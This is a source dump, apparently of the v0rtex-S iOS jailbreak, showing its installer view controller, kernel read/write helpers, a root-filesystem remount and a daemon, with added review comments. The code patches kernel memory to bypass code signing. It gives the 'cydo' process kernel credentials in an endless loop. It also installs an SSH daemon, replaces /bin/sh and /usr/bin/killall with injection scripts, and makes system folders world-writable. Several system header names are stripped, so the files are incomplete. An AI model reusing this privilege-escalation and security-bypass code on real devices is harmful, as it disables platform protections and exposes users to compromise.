remountOutput); 320 | if (remountOutput != 0) { 321 | [self writeText:@"ERROR: failed to remount '/' as r/w"]; 322 | // return; 323 | } 324 | 325 | [self writeText:@"remounted '/' as r/w"]; 326 | 327 | 328 | // Write a test file to root 329 | 330 | [self writeText:@"writing test root file..."]; 331 | 332 | FILE *rootF = fopen("/test.txt", "w"); 333 | LOG("root file: %p", rootF); 334 | if (rootF == 0) { 335 | [self writeText:@"ERROR: failed to write root test file"]; 336 | // return; 337 | } 338 | 339 | [self writeText:@"wrote test root file!"]; 340 | [self writeText:[NSString stringWithFormat:@"/test.txt (%p)", rootF]]; 341 | 342 | 343 | 344 | // init filemanager n bundlepath 345 | NSFileManager *fileMgr = [NSFileManager defaultManager]; 346 | NSString *bundlePath = [NSString stringWithFormat:@"%s", bundle_path()]; 347 | 348 | { 349 | // remove old files 350 | NSLog(@"removing old files..."); 351 | [fileMgr removeItemAtPath:@"/v0rtex/bins" error:nil]; 352 | [fileMgr removeItemAtPath:@"/v0rtex/bootstrap.tar" error:nil]; 353 | [fileMgr removeItemAtPath:@"/v0rtex/bootstrap2.tar" error:nil]; 354 | [fileMgr removeItemAtPath:@"/v0rtex/dropbear" error:nil]; 355 | [fileMgr removeItemAtPath:@"/v0rtex/start.sh" error:nil]; 356 | [fileMgr removeItemAtPath:@"/v0rtex/tar" error:nil]; 357 | [fileMgr removeItemAtPath:@"/bin/sh" error:nil]; 358 | 359 | // copy in all our bins 360 | NSLog(@"copying bins..."); 361 | 362 | // create v0rtex dirs 363 | mkdir("/v0rtex", 0777); 364 | //mkdir("/v0rtex/bins", 0777); 365 | mkdir("/v0rtex/logs", 0777); 366 | 367 | NSError *error; 368 | [fileMgr copyItemAtPath:[bundlePath stringByAppendingString:@"/bootstrap.tar"] 369 | toPath:@"/v0rtex/bootstrap.tar" error: &error]; 370 | if (error) NSLog(@"Error: %@", error); 371 | 372 | [fileMgr copyItemAtPath:[bundlePath stringByAppendingString:@"/dropbear"] 373 | toPath:@"/v0rtex/dropbear" error: &error]; 374 | if (error) NSLog(@"Error: %@", error); 375 | 376 | [fileMgr copyItemAtPath:[bundlePath 
stringByAppendingString:@"/tar"] 377 | toPath:@"/v0rtex/tar" error: &error]; 378 | /* NOTE(review): NSFileManager leaves the out-error untouched on success, and the same variable is reused without being reset, so after the first failed copy every following check re-logs the stale error (and a failure is never acted on). Test the BOOL result of copyItemAtPath:toPath:error: instead. */ if (error) NSLog(@"Error: %@", error); 379 | 380 | [fileMgr copyItemAtPath:[bundlePath stringByAppendingString:@"/extrainst_"] 381 | toPath:@"/v0rtex/extrainst_" error: &error]; 382 | if (error) NSLog(@"Error: %@", error); 383 | 384 | [fileMgr removeItemAtPath:@"/usr/libexec/cydia/cydo" error:nil]; 385 | [fileMgr copyItemAtPath:[bundlePath stringByAppendingString:@"/cydo"] 386 | toPath:@"/usr/libexec/cydia/cydo" error: &error]; 387 | if (error) NSLog(@"Error: %@", error); 388 | 389 | [fileMgr copyItemAtPath:[bundlePath stringByAppendingString:@"/bash"] 390 | toPath:@"/bin/sh" error: &error]; 391 | if (error) NSLog(@"Error: %@", error); 392 | 393 | // make sure all our bins have perms 394 | /* NOTE(review): 0777 leaves these binaries world-writable, and they are run later with elevated privileges (extrainst_ via system(), /bin/sh by every system() call in this file), so anything that can write to them can change what gets executed. 0755 grants execution without that exposure; the chmod results are also unchecked. */ chmod("/v0rtex/dropbear", 0777); 395 | chmod("/v0rtex/tar", 0777); 396 | chmod("/bin/sh", 0777); 397 | chmod("/v0rtex/extrainst_", 0777); 398 | chmod("/usr/libexec/cydia/cydo", 0777); 399 | 400 | // create dir's and files for dropbear 401 | mkdir("/etc", 0777); 402 | mkdir("/etc/dropbear", 0777); 403 | mkdir("/var", 0777); 404 | mkdir("/var/log", 0777); 405 | /* NOTE(review): fopen's result is not checked (and the mkdir results above are ignored); if /var/log/lastlog cannot be opened, fclose(NULL) is undefined behaviour and crashes the app here. */ FILE *lastLog = fopen("/var/log/lastlog", "ab+"); 406 | fclose(lastLog); 407 | } 408 | 409 | { 410 | //first amfi patch: for v0rtex files 411 | /* patch_amfi's return value is only displayed; a failure does not stop the install from continuing. */ int amfi = patch_amfi(tfp0, kslide, YES, [self.hastweaks isOn]); 412 | [self writeText:[NSString stringWithFormat:@"v0rtex amfi: %d", amfi]]; 413 | } 414 | 415 | { 416 | //installed? 
417 | /* Marker-file check: /.installed_v0rtexb4 existing means the bootstrap was extracted on an earlier run. NOTE(review): f is never closed, so a descriptor leaks on every run. */ int f = open("/.installed_v0rtexb4", O_RDONLY); 418 | 419 | if (f == -1 || [self.reinstallcydia isOn]) { 420 | system("rm -rf /var/lib/dpkg && ln -sf /.dpkg/dpkg /var/lib/dpkg"); //if we have an older version remove it 421 | // extract bootstrap.tar 422 | /* NOTE(review): execprog's return value is ignored and the marker file below is created unconditionally, so a failed extraction is recorded as installed and skipped on the next run unless the reinstall switch is on. */ execprog(tfp0, kslide, 0, "/v0rtex/tar", (const char **)&(const char*[]){ "/v0rtex/tar", "--preserve-permissions", "--no-overwrite-dir", "-xvf", "/v0rtex/bootstrap.tar", "-C", "/", NULL }); 423 | 424 | //trust all the binaries 425 | 426 | /* NOTE(review): O_CREAT without a mode argument takes the new file's permission bits from an unspecified value, and both descriptors are discarded without close(). Use open(path, O_RDWR|O_CREAT, 0644) and close the result. */ open("/.installed_v0rtexb4", O_RDWR|O_CREAT); 427 | open("/.cydia_no_stash",O_RDWR|O_CREAT); 428 | 429 | //system("/usr/bin/uicache"); 430 | system("killall -SIGSTOP cfprefsd"); 431 | /* NOTE(review): initWithContentsOfFile: returns nil when the plist is missing or unreadable; the setObject:/writeToFile: messages to nil are then silent no-ops, and writeToFile:'s BOOL result is not checked. cfprefsd is presumably stopped around the edit so it cannot rewrite the file from its cache - confirm. */ NSMutableDictionary* md = [[NSMutableDictionary alloc] initWithContentsOfFile:@"/var/mobile/Library/Preferences/com.apple.springboard.plist"]; 432 | [md setObject:[NSNumber numberWithBool:YES] forKey:@"SBShowNonDefaultSystemApps"]; 433 | [md writeToFile:@"/var/mobile/Library/Preferences/com.apple.springboard.plist" atomically:YES]; 434 | system("killall -9 cfprefsd"); 435 | } 436 | } 437 | 438 | { 439 | 440 | /* NOTE(review): these make /private, /private/var and the whole mobile Library/Preferences path world-writable for every process on the device, and the change persists after the tool exits; only the plist itself gets its owner and 0600 mode restored below. If the goal is only to make the plist write above succeed, narrow this to that path. The chmod/chown results are unchecked. */ chmod("/private", 0777); 441 | chmod("/private/var", 0777); 442 | chmod("/private/var/mobile", 0777); 443 | chmod("/private/var/mobile/Library", 0777); 444 | chmod("/private/var/mobile/Library/Preferences", 0777); 445 | chmod("/private/var/mobile/Library/Preferences/com.apple.springboard.plist", 0600); //rw/-/- 446 | chown("/private/var/mobile/Library/Preferences/com.apple.springboard.plist", 501, 501); //mobile 447 | 448 | } 449 | 450 | { 451 | //second amfi patch, binaries, tweaks & Cydia 452 | int amfi2 = patch_amfi(tfp0, kslide, NO, [self.hastweaks isOn]); 453 | [self writeText:[NSString stringWithFormat:@"cydia amfi: %d", amfi2]]; 454 | /* NOTE(review): executes a binary that this method chmod'ed 0777 when copying it in; a world-writable file run with elevated privileges is a tamper risk, and 0755 is sufficient for it to execute. The exit status of system() is ignored. */ system("/v0rtex/extrainst_"); //taken from substrate, patched the move.sh string so it doesn't stash 455 | dispatch_async(dispatch_get_global_queue(DISPATCH_QUEUE_PRIORITY_DEFAULT, 0), ^{ 456 | NSLog(@"cleaning up..."); 457 | [fileMgr 
removeItemAtPath:@"/v0rtex/bins" error:nil]; 458 | [fileMgr removeItemAtPath:@"/v0rtex/bootstrap.tar" error:nil]; 459 | [fileMgr removeItemAtPath:@"/v0rtex/bootstrap2.tar" error:nil]; 460 | [fileMgr removeItemAtPath:@"/v0rtex/dropbear" error:nil]; 461 | [fileMgr removeItemAtPath:@"/v0rtex/start.sh" error:nil]; 462 | [fileMgr removeItemAtPath:@"/v0rtex/tar" error:nil]; 463 | [fileMgr removeItemAtPath:@"/v0rtex/extrainst_" error:nil]; 464 | [fileMgr removeItemAtPath:@"/v0rtex/postinst" error:nil]; 465 | [fileMgr removeItemAtPath:@"/v0rtex/prerm" error:nil]; 466 | 467 | chmod("/Library/LaunchDaemons/dropbear.plist", 0644); 468 | chown("/Library/LaunchDaemons/dropbear.plist", 0, 0); 469 | chmod("/Library/LaunchDaemons/com.saurik.Cydia.Startup.plist", 0644); 470 | chown("/Library/LaunchDaemons/com.saurik.Cydia.Startup.plist", 0, 0); 471 | chmod("/Library/LaunchDaemons/0.reload.plist", 0644); 472 | chown("/Library/LaunchDaemons/0.reload.plist", 0, 0); 473 | system("launchctl load /Library/LaunchDaemons/dropbear.plist"); 474 | system("launchctl load /Library/LaunchDaemons/com.saurik.Cydia.Startup.plist"); 475 | system("echo 'string=$(ps aux | grep $1 | grep -v grep | grep -v pidof | grep -v pidsof); list=(${string}); for pid in ${!list[@]}; do ((pid == 1)) && printf \"${list[$pid]}\"; done' > /usr/bin/pidof; chmod 777 /usr/bin/pidof"); 476 | if ([self.shallrespring isOn]) { 477 | system("echo 'killall SpringBoard' > /usr/libexec/reload"); 478 | } 479 | else { 480 | system("echo 'killall nothing' > /usr/libexec/reload"); 481 | } 482 | if (self.method.selectedSegmentIndex == 0) { 483 | NSLog(@"doing method 1"); 484 | system("printf \"#/bin/bash\\nif [ \\$# -eq \"2\" ]; then\\nkillall_ \\$1 \\$2 && cynject \\$(pidof System/Library/CoreServices/SpringBoard.app/SpringBoard) /Library/MobileSubstrate/MobileSubstrate.dylib\\nelif [ \\$# -eq \"1\" ]; then\\nkillall_ \\$1 && cynject \\$(pidof System/Library/CoreServices/SpringBoard.app/SpringBoard) 
/Library/MobileSubstrate/MobileSubstrate.dylib\\nfi\" > /usr/bin/killall");
            }
            else {
                NSLog(@"doing method 2");
                system("printf \"#/bin/bash\\nif [ \\$# -eq \"2\" ]; then\\nkillall_ \\$1 \\$2\\nfor i in /Library/MobileSubstrate/DynamicLibraries/*.dylib\\ndo\\ncynject \\$(pidof System/Library/CoreServices/SpringBoard.app/SpringBoard) \\$i\\ndone\\nelif [ \\$# -eq \"1\" ]; then\\nkillall_ \\$1\\nfor i in /Library/MobileSubstrate/DynamicLibraries/*.dylib\\ndo\\ncynject \\$(pidof System/Library/CoreServices/SpringBoard.app/SpringBoard) \\$i\\ndone\\nfi\" > /usr/bin/killall");
            }

            if ([self.hastweaks isOn]) {
                system("launchctl unload /Library/LaunchDaemons/0.reload.plist");
                system("launchctl load /Library/LaunchDaemons/0.reload.plist");
            }
        });


    }


    // Done.
    [self writeText:@""];
    [self writeText:@"done."]; //logging does not work now for now
    sleep(3);
    // startJBD() (cydia/jailbreakd.m) is an unbounded for(;;) loop and never
    // returns, so nothing placed after this call would ever execute.
    extern void startJBD(void);
    startJBD();
}


// Appends one line to the on-screen log: `text` followed by "\n" is added to
// the current `outputView.text`. Nothing else is written. `outputView` is
// presumably a UIKit text view, so this should run on the main thread —
// confirm at the call sites.
- (void)writeText:(NSString *)text {
    NSString *line = [text stringByAppendingString:@"\n"];
    NSString *existing = self.outputView.text;
    self.outputView.text = [existing stringByAppendingString:line];
}

@end
--------------------------------------------------------------------------------
/v0rtex-S/bash:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/thisiswisy/v0rtex-injector/18a242c97ba0c4d45a553c78ef91cf9145e9e17e/v0rtex-S/bash
--------------------------------------------------------------------------------
/v0rtex-S/bootstrap.tar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/thisiswisy/v0rtex-injector/18a242c97ba0c4d45a553c78ef91cf9145e9e17e/v0rtex-S/bootstrap.tar
--------------------------------------------------------------------------------
/v0rtex-S/common.h:
--------------------------------------------------------------------------------
#ifndef COMMON_H
#define COMMON_H

// NOTE(review): the header names on the next two #include lines were lost
// when this page was extracted (angle-bracketed names stripped). The first
// is presumably <stdint.h> given the uint*_t remark; restore both before
// building.
#include // uint*_t
#include

// LOG(fmt, ...) — NSLog with a newline concatenated onto the literal format
// string. `##args` is the GNU extension that drops the trailing comma when
// no variadic arguments are supplied.
#define LOG(str, args...) do { NSLog(@str "\n", ##args); } while(0)

// ADDR is the printf format used for a kernel pointer; kptr_t is the
// matching integer width. Both are selected by the target's pointer size.
#ifdef __LP64__
# define ADDR "0x%016llx"
typedef uint64_t kptr_t;
#else
# define ADDR "0x%08x"
typedef uint32_t kptr_t;
#endif

#endif
--------------------------------------------------------------------------------
/v0rtex-S/cydia/jailbreakd.m:
--------------------------------------------------------------------------------
//
//  ViewController.m
//  v0rtex
//
//  Created by Jake James on 2017-12-07.
//  Copyright © 2017 cheesecakeufo, ninjaprawn, xerub. ALL RIGHTS DESERVED
//  THANK YOU CHEESECAKEUFO FOR THE IDEA AND CYDO
//
// NOTE(review): the header above still names ViewController.m; this file is
// cydia/jailbreakd.m.

#import "ViewController.h"

#include "v0rtex.h"
#include "kernel.h"
#include "symbols.h"
// NOTE(review): the six system header names below were lost in extraction;
// restore them before building.
#include
#include
#include
#include
#include
#include
#include "patchfinder64.h"

/* CODE IS AWFUL AND I KNOW IT, DO NOT COMPLAIN.
NOT MY PRIORITY CLEANING IT UP */

// Both are defined elsewhere in the project (not visible here); kptr_t is
// uint64_t on LP64 per common.h.
extern task_t tfp0;
extern kptr_t kern_ucred;

// Code-signing flag bits (cs_blobs.h layout) used by empower_proc below.
#define CS_VALID 0x0000001 /* dynamically valid */
#define CS_ADHOC 0x0000002 /* ad hoc signed */
#define CS_GET_TASK_ALLOW 0x0000004 /* has get-task-allow entitlement */
#define CS_INSTALLER 0x0000008 /* has installer entitlement */

#define CS_HARD 0x0000100 /* don't load invalid pages */
#define CS_KILL 0x0000200 /* kill process if it becomes invalid */
#define CS_CHECK_EXPIRATION 0x0000400 /* force expiration checking */
#define CS_RESTRICT 0x0000800 /* tell dyld to treat restricted */
#define CS_ENFORCEMENT 0x0001000 /* require enforcement */
#define CS_REQUIRE_LV 0x0002000 /* require library validation */
#define CS_ENTITLEMENTS_VALIDATED 0x0004000

#define CS_ALLOWED_MACHO 0x00ffffe

#define CS_EXEC_SET_HARD 0x0100000 /* set CS_HARD on any exec'ed process */
#define CS_EXEC_SET_KILL 0x0200000 /* set CS_KILL on any exec'ed process */
#define CS_EXEC_SET_ENFORCEMENT 0x0400000 /* set CS_ENFORCEMENT on any exec'ed process */
#define CS_EXEC_SET_INSTALLER 0x0800000 /* set CS_INSTALLER on any exec'ed process */

#define CS_KILLED 0x1000000 /* was killed by kernel for invalidity */
#define CS_DYLD_PLATFORM 0x2000000 /* dyld used to load this is a platform binary */
#define CS_PLATFORM_BINARY 0x4000000 /* this is a platform binary */
#define CS_PLATFORM_PATH 0x8000000 /* platform binary by the fact of path (osx only) */



// Walks the kernel's process list and returns the address of the first proc
// whose name contains `name` (substring match via strstr, so "cydo" also
// matches any longer name containing it).
//
// Layout assumptions are hard-coded: the list head comes from
// find_allproc() (presumably patchfinder64.h), the next-pointer is read from
// offset 0 of each proc, and the 20-byte name is read from proc + 0x26c.
// These offsets are kernel-build specific and are not validated here.
//
// Every proc address visited is printed to stdout in decimal.
//
// Returns UINT64_MAX (the literal -1 converted to uint64_t) when no match is
// found; callers must compare against that value, not -1 of another type.
uint64_t procForName(char *name) {
    //THANK YOU NINJAPRAWN
    uint64_t proc = rk64(tfp0, find_allproc());
    printf("\nINFO: proc: %llu", proc);
    while (proc) {
        // 40-byte zeroed buffer, 20 bytes read: always NUL-terminated.
        char comm[40] = {0};
        kread(proc + 0x26c, comm, 20);
        //uint32_t pid = (uint32_t)rk32_via_tfp0(tfp0, proc + 0x10);
        printf("\n%s's proc: %llu", comm, proc);
        if (strstr(comm, name)) {
            printf("\nINFO: success: process is: %s and proc is : %llu", comm, proc);
            return proc;
        }
        // Next entry: the pointer stored at the start of the proc struct.
        proc = rk64(tfp0, proc);
    }
    return -1;
}
// Rewrites the code-signing flags at proc + 0x2a8 and replaces the ucred
// pointer at proc + 0x100 with `kern_ucred`.
//
// Note the parameter `kern_ucred` shadows the file-level extern of the same
// name; the value actually written is whatever the caller passes.
//
// Always returns KERN_SUCCESS: wk32/wk64 (kernel.m) swallow write failures,
// so this function cannot report whether either write took effect, and no
// check is made that `proc` is a valid proc address.
kern_return_t empower_proc(uint64_t proc, uint64_t kern_ucred) {
    uint32_t csflags = rk32_via_tfp0(tfp0, proc + 0x2a8 /* csflags */);
    // NOTE: if the read above failed, csflags is 0 (rk32_via_tfp0's error
    // value) and the write below replaces the real flags with just the
    // bits set here.
    csflags = (csflags | CS_PLATFORM_BINARY | CS_INSTALLER | CS_GET_TASK_ALLOW) & ~(CS_RESTRICT | CS_KILL | CS_HARD);
    wk32(tfp0, proc + 0x2a8 /* csflags */, csflags);
    wk64(proc + 0x100 /* KSTRUCT_OFFSET_PROC_UCRED */, kern_ucred);

    return KERN_SUCCESS;
}

// Daemon loop: repeatedly looks up a process named "cydo" and applies
// empower_proc to it. There is no sleep, so this spins continuously, and
// there is no exit condition, so the function never returns (the caller in
// ViewController.m invokes it last for that reason).
//
// Known defect (the TODO below): the not-found sentinel from procForName is
// UINT64_MAX and the guard is commented out, so on a miss empower_proc is
// called with proc = UINT64_MAX; proc + 0x2a8 then wraps to 0x2a7 and the
// reads/writes target that low address (the writes fail silently in wk32).
void startJBD() {

    for(;;) {
        //system("echo $(pidof cydo) > /var/mobile/cydopid.txt"); //pls don't complain about awful code I'm lazy
        //const char *pid = [[NSString stringWithContentsOfFile:@"/var/mobile/cydopid.txt" encoding:NSUTF8StringEncoding error:nil] UTF8String];
        //NSLog(@"found pid is: %s", pid);
        // if (pid != NULL && pid != nil && strcmp(pid, "") != 0) {
        uint64_t target_proc = procForName("cydo");
        // if (target_proc == -1) break; TODO: FIX THIS. Interrupts loop
        empower_proc(target_proc, kern_ucred);

        // }
    }
}


--------------------------------------------------------------------------------
/v0rtex-S/cydo:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/thisiswisy/v0rtex-injector/18a242c97ba0c4d45a553c78ef91cf9145e9e17e/v0rtex-S/cydo
--------------------------------------------------------------------------------
/v0rtex-S/dropbear:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/thisiswisy/v0rtex-injector/18a242c97ba0c4d45a553c78ef91cf9145e9e17e/v0rtex-S/dropbear
--------------------------------------------------------------------------------
/v0rtex-S/extrainst_:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/thisiswisy/v0rtex-injector/18a242c97ba0c4d45a553c78ef91cf9145e9e17e/v0rtex-S/extrainst_
--------------------------------------------------------------------------------
/v0rtex-S/kernel.h:
--------------------------------------------------------------------------------
//
//  kernel.h
//  v0rtex-s
//
//  Created by Ben on 16/12/2017.
//  Copyright © 2017 Sticktron. All rights reserved.
//

// NOTE(review): this header has no include guard, and the system header name
// on the next line was lost in extraction (presumably a mach header, since
// task_t/vm_map_t/mach_vm_* are used below); restore it before building.
#include
// Stores the task port in the file-level global `tfp0` that the helpers
// below use.
void init_kernel(task_t task_for_port0);
// 64-bit kernel read composed of two 32-bit reads; a failed half reads as 0.
uint64_t rk64(task_t tfp0, uint64_t kaddr);
// 32-bit kernel read; returns 0 on any failure or short read, which is
// indistinguishable from reading a genuine zero.
uint32_t rk32_via_tfp0(task_t tfp0, uint64_t kaddr);
// 32-bit kernel write; failures are not reported to the caller.
void wk32(task_t tfp0, uint64_t kaddr, uint32_t val);
// 64-bit kernel write as two 32-bit writes through the global tfp0
// (note: unlike rk64/rk32/wk32 it takes no port argument).
void wk64(uint64_t kaddr, uint64_t val);
// Local prototypes for the mach_vm calls used by kernel.m — presumably
// declared here because the SDK in use does not ship a user-space
// mach/mach_vm.h; confirm against the build environment.
kern_return_t mach_vm_write(
    vm_map_t target_task,
    mach_vm_address_t address,
    vm_offset_t data,
    mach_msg_type_number_t dataCnt);

kern_return_t mach_vm_read_overwrite(
    vm_map_t target_task,
    mach_vm_address_t address,
    mach_vm_size_t size,
    mach_vm_address_t data,
    mach_vm_size_t *outsize);

// Chunked copy of `size` bytes from kernel address `where` into `p`;
// returns the number of bytes actually read (may be short on error).
size_t kread(uint64_t where, void *p, size_t size);
// Chunked copy of `size` bytes from `p` to kernel address `where`;
// returns the number of bytes submitted without error (may be short).
size_t kwrite(uint64_t where, const void *p, size_t size);
// kwrite of one uint64_t; returns kwrite's byte count.
size_t kwrite_uint64(uint64_t where, uint64_t value);
--------------------------------------------------------------------------------
/v0rtex-S/kernel.m:
--------------------------------------------------------------------------------
//
//  kernel.m
//  v0rtex
//
//  Created by Ben on 16/12/2017.
//  Copyright © 2017 Sticktron. All rights reserved.
//

#include "kernel.h"
// NOTE(review): the three system header names below were lost in extraction;
// restore them before building.
#include
#include
#include

// Kernel task port used by every helper in this file; defined elsewhere in
// the project (not visible here) and set by init_kernel().
extern task_t tfp0;

// Records the kernel task port for later reads/writes.
void init_kernel(task_t task_for_port0) {
    tfp0 = task_for_port0;
}

// Reads a 64-bit value at `kaddr` as two 32-bit reads (low word first).
// The two reads are not atomic, and because rk32_via_tfp0 returns 0 on
// failure, a failed half silently contributes zero bits to the result.
uint64_t rk64(task_t tfp0, uint64_t kaddr) {
    uint64_t lower = rk32_via_tfp0(tfp0, kaddr);
    uint64_t higher = rk32_via_tfp0(tfp0, kaddr + 4);
    return ((higher << 32) | lower);
}

// Reads a 32-bit value at `kaddr` via mach_vm_read_overwrite on `tfp0`
// (the parameter shadows the global of the same name).
// Returns 0 if the call fails or returns fewer than 4 bytes; callers cannot
// distinguish that from a genuine zero. Diagnostics are commented out.
uint32_t rk32_via_tfp0(task_t tfp0, uint64_t kaddr) {
    kern_return_t err;
    uint32_t val = 0;
    mach_vm_size_t outsize = 0;

    // mach (for kern r/w primitives)
    // NOTE(review): this block-scope prototype of mach_vm_write is unused
    // in this function; kernel.h already declares it at file scope.
    kern_return_t mach_vm_write(
        vm_map_t target_task,
        mach_vm_address_t address,
        vm_offset_t data,
        mach_msg_type_number_t dataCnt);

    err = mach_vm_read_overwrite(tfp0,
                                 (mach_vm_address_t)kaddr,
                                 (mach_vm_size_t)sizeof(uint32_t),
                                 (mach_vm_address_t)&val,
                                 &outsize);

    if (err != KERN_SUCCESS) {
        // printf("tfp0 read failed %s addr: 0x%llx err:%x port:%x\n", mach_error_string(err), kaddr, err, tfp0);
        // sleep(3);
        return 0;
    }

    if (outsize != sizeof(uint32_t)) {
        // printf("tfp0 read was short (expected %lx, got %llx\n", sizeof(uint32_t), outsize);
        // sleep(3);
        return 0;
    }

    return val;
}

// Writes the 32-bit `val` at `kaddr` via mach_vm_write on `tfp0` (again
// shadowing the global). Returns silently both when no port is available
// (MACH_PORT_NULL) and when the write fails, so callers get no status.
void wk32(task_t tfp0, uint64_t kaddr, uint32_t val) {
    if (tfp0 == MACH_PORT_NULL) {
        // printf("attempt to write to kernel memory before any kernel memory write primitives available\n");
        // sleep(3);
        return;
    }

    kern_return_t err;
    err = mach_vm_write(tfp0,
                        (mach_vm_address_t)kaddr,
                        (vm_offset_t)&val,
                        (mach_msg_type_number_t)sizeof(uint32_t));

    if (err != KERN_SUCCESS) {
        // printf("tfp0 write failed: %s %x\n", mach_error_string(err), err);
        return;
    }
}



// Writes the 64-bit `val` at `kaddr` as two 32-bit writes through the global
// tfp0, low word first. Not atomic: a reader between the two writes sees a
// mixed value, and a failure of either half is not reported.
void wk64(uint64_t kaddr, uint64_t val) {
    uint32_t lower = (uint32_t)(val & 0xffffffff);
    uint32_t higher = (uint32_t)(val >> 32);
    wk32(tfp0, kaddr, lower);
    wk32(tfp0, kaddr + 4, higher);
}
// Copies `size` bytes from kernel address `where` into `p`, in chunks of at
// most 2048 bytes, advancing by the byte count each call actually returned.
// Stops at the first error or zero-length read (logged to stderr) and
// returns the number of bytes read so far, so a short return signals failure.
// `rv` is an int receiving a kern_return_t.
size_t kread(uint64_t where, void *p, size_t size) {
    int rv;
    size_t offset = 0;
    while (offset < size) {
        mach_vm_size_t sz, chunk = 2048;
        if (chunk > size - offset) {
            chunk = size - offset;
        }
        rv = mach_vm_read_overwrite(tfp0, where + offset, chunk, (mach_vm_address_t)p + offset, &sz);
        if (rv || sz == 0) {
            fprintf(stderr, "[e] error reading kernel @%p\n", (void *)(offset + where));
            break;
        }
        offset += sz;
    }
    return offset;
}

// Copies `size` bytes from `p` to kernel address `where`, in chunks of at
// most 2048 bytes. Unlike kread there is no out-count: `offset` advances by
// the full `chunk` after each non-error call, so the return value is the
// number of bytes submitted before the first error (logged to stdout), not
// bytes independently confirmed.
size_t kwrite(uint64_t where, const void *p, size_t size) {
    int rv;
    size_t offset = 0;
    while (offset < size) {
        size_t chunk = 2048;
        if (chunk > size - offset) {
            chunk = size - offset;
        }
        rv = mach_vm_write(tfp0,
                           where + offset,
                           (mach_vm_offset_t)p + offset,
                           (mach_msg_type_number_t)chunk);

        if (rv) {
            printf("[kernel] error copying buffer into region: @%p \n", (void *)(offset + where));
            break;
        }

        offset +=chunk;
    }

    return offset;
}


// Convenience wrapper: kwrite of a single uint64_t. Returns kwrite's byte
// count (8 on success, less on failure).
size_t kwrite_uint64(uint64_t where, uint64_t value) {
    return kwrite(where, &value, sizeof(value));
}

--------------------------------------------------------------------------------
/v0rtex-S/launchctl:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/thisiswisy/v0rtex-injector/18a242c97ba0c4d45a553c78ef91cf9145e9e17e/v0rtex-S/launchctl
--------------------------------------------------------------------------------
/v0rtex-S/ls:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/thisiswisy/v0rtex-injector/18a242c97ba0c4d45a553c78ef91cf9145e9e17e/v0rtex-S/ls
--------------------------------------------------------------------------------
/v0rtex-S/main.m:
--------------------------------------------------------------------------------
//
//  main.m
//  v0rtex
//
//  Created by Sticktron on 2017-12-07.
//  Copyright © 2017 Sticktron. All rights reserved.
//

// NOTE(review): the framework name on the first #import was lost in
// extraction; restore it before building.
#import
#import "AppDelegate.h"

// Process entry point: hands control to UIKit with AppDelegate as the
// application delegate. UIApplicationMain runs the main loop and its return
// value is passed straight back as the process exit status.
int main(int argc, char * argv[]) {
    @autoreleasepool {
        NSString *delegateClassName = NSStringFromClass([AppDelegate class]);
        return UIApplicationMain(argc, argv, nil, delegateClassName);
    }
}
--------------------------------------------------------------------------------
/v0rtex-S/root-rw.h:
--------------------------------------------------------------------------------
//
//  root-rw.h
//  v0rtex-s
//
//  Created by Ben on 16/12/2017.
//  Copyright © 2017 Sticktron. All rights reserved.
//

// NOTE(review): the two system header names below were lost in extraction;
// restore them before building.
#include
#include

// Remounts "/" read-write using the kernel task port and the kernel slide;
// returns the result of mount(2). Implemented in root-rw.m.
int mount_root(task_t tfp0, uint64_t kslide);
--------------------------------------------------------------------------------
/v0rtex-S/root-rw.m:
--------------------------------------------------------------------------------
//
//  root-rw.m
//  v0rtex
//
//  Created by Ben on 16/12/2017.
//  Copyright © 2017 Sticktron. All rights reserved.
//

#include "root-rw.h"
#include "kernel.h"
#include "symbols.h"

// For '/' remount (not offsets)
// Struct offsets for one specific kernel layout; the commented-out
// alternative shows these have differed between builds. Nothing here
// validates them against the running kernel.
#define KSTRUCT_OFFSET_MOUNT_MNT_FLAG 0x70
//#define KSTRUCT_OFFSET_MOUNT_MNT_FLAG 0xd8
#define KSTRUCT_OFFSET_VNODE_V_UN 0xd8

// Remounts the root filesystem read-write.
//
// Steps: read the root vnode pointer from the slid OFFSET_ROOT_MOUNT_V_NODE,
// follow v_un to the mount struct, read the mount flags one byte past
// mnt_flag (hence the matching `MNT_ROOTFS >> 8` when clearing the bit),
// clear MNT_ROOTFS, call mount(2) with MNT_UPDATE for "/" on /dev/disk0s1s1
// as hfs, then write the previously read flags back.
//
// Returns mount(2)'s int result (rv is declared kern_return_t but holds the
// mount() return value).
//
// Caveats visible in the code: the string from strdup() is never freed; the
// kernel reads/writes report no errors, so if the initial rk32 fails v_flag
// is 0 and the "restore" step writes 0 over the real flags.
int mount_root(task_t tfp0, uint64_t kslide) {
    uint64_t _rootnode = OFFSET_ROOT_MOUNT_V_NODE + kslide;
    uint64_t rootfs_vnode = rk64(tfp0, _rootnode);

    // read the original flags
    uint64_t v_mount = rk64(tfp0, rootfs_vnode + KSTRUCT_OFFSET_VNODE_V_UN);
    uint32_t v_flag = rk32_via_tfp0(tfp0, v_mount + KSTRUCT_OFFSET_MOUNT_MNT_FLAG + 1);

    // unset rootfs flag
    wk32(tfp0, v_mount + KSTRUCT_OFFSET_MOUNT_MNT_FLAG + 1, v_flag & ~(MNT_ROOTFS >> 8));

    // remount
    char *nmz = strdup("/dev/disk0s1s1");
    kern_return_t rv = mount("hfs", "/", MNT_UPDATE, (void *)&nmz);

    // set original flags back
    // (v_mount is re-read rather than reused; same vnode, same offset)
    v_mount = rk64(tfp0, rootfs_vnode + KSTRUCT_OFFSET_VNODE_V_UN);
    wk32(tfp0, v_mount + KSTRUCT_OFFSET_MOUNT_MNT_FLAG + 1, v_flag);

    return rv;
}
--------------------------------------------------------------------------------
/v0rtex-S/symbols.h:
--------------------------------------------------------------------------------
//
//  symbols.h
//  v0rtex-s
//
//  Created by Ben on 16/12/2017.
//  Copyright © 2017 Sticktron. All rights reserved.
//

// NOTE(review): the four system header names below were lost in extraction;
// restore them before building.
#include
#include
#include
#include
#include "common.h"

// Unslid kernel addresses for one specific device/build combination. They
// are zero until init_symbols() (symbols.m) fills them in by matching
// uname().machine and the OS version string; consumers add the kernel
// slide themselves (see mount_root in root-rw.m).
extern uint64_t OFFSET_ZONE_MAP;
extern uint64_t OFFSET_KERNEL_MAP;
extern uint64_t OFFSET_KERNEL_TASK;
extern uint64_t OFFSET_REALHOST;
extern uint64_t OFFSET_COPYIN;
